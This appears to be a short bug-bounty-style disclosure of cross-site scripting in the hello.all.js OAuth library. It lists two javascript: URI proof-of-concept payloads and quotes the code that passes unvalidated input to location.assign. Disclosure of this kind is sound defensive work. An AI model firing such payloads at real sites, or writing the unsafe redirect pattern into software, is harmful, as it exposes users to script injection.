Summary
I found that an attacker is able to preform cross site scripting attacks due of unsafe redirect due of multiple vulnerable codes in hello.all.js

PoC
1 -?state={"oauth_proxy":"javascript:alert(document.domain)//"}&code=0
2 - #oauth_redirect=javascript:alert(1)

Vulnerable codes

else if ('oauth_redirect' in p) {
var url = decodeURIComponent(p.oauth_redirect);
location.assign(url);
return;
}

if (p && p.state && (p.code || p.oauth_token)) {
var state = JSON.parse(p.state);
// Add this path as the redirect_uri
p.redirect_uri = state.redirect_uri || location.href.replace(/[?#].*$/, '');
// Redirect to the host
var path = _this.qs(state.oauth_proxy, p);
location.assign(path);
return;
}